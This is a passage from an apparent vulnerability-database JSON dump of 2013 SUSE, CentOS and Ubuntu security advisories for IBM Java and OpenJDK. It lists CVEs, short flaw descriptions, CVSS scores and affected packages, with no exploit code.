Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-25T20:04:13", "published": "2013-07-25T20:04:13", "id": "SUSE-SU-2013:1255-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html", "type": "suse", "title": "Security update for java-1_6_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:04", "bulletinFamily": "unix", "description": "IBM Java 1.7.0 has been updated to SR5 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-25T20:04:17", "published": "2013-07-25T20:04:17", "id": "SUSE-SU-2013:1256-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html", "type": "suse", "title": "Security update for java-1_7_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:41", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 was updated to SR14 to fix bugs and security\n issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-30T19:04:11", "published": "2013-07-30T19:04:11", "id": "SUSE-SU-2013:1255-3", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00033.html", "type": "suse", "title": "Security update for IBM Java 1.6.0 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:39:29", "bulletinFamily": "unix", "description": "This release updates our OpenJDK 7 support in the 2.4.x\n series with a number of security fixes and synchronises it\n with upstream development. The security issues fixed (a\n long list) can be found in the following link:\n\n <a rel=\"nofollow\" href=\"http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-O\">http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-O</a>\n ctober/025087.html\n <<a rel=\"nofollow\" href=\"http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-\">http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-</a>\n October/025087.html>\n", "modified": "2013-11-13T15:04:17", "published": "2013-11-13T15:04:17", "id": "SUSE-SU-2013:1666-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html", "title": "Security update for OpenJDK 7 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-05-29T18:35:43", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1505\n\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020016.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020019.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1505.html", "modified": "2013-11-05T21:41:40", "published": "2013-11-05T20:45:16", "href": "http://lists.centos.org/pipermail/centos-announce/2013-November/020016.html", "id": "CESA-2013:1505", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1451\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019985.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1451.html", "modified": "2013-10-23T11:04:05", "published": "2013-10-23T11:04:05", "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019985.html", "id": "CESA-2013:1451", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1447\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019980.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1447.html", "modified": "2013-10-22T07:41:01", "published": "2013-10-22T07:41:01", "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019980.html", "id": "CESA-2013:1447", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:18", "bulletinFamily": "unix", "description": "Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)", "modified": "2013-11-21T00:00:00", "published": "2013-11-21T00:00:00", "id": "USN-2033-1", "href": "https://usn.ubuntu.com/2033-1/", "title": "OpenJDK 6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}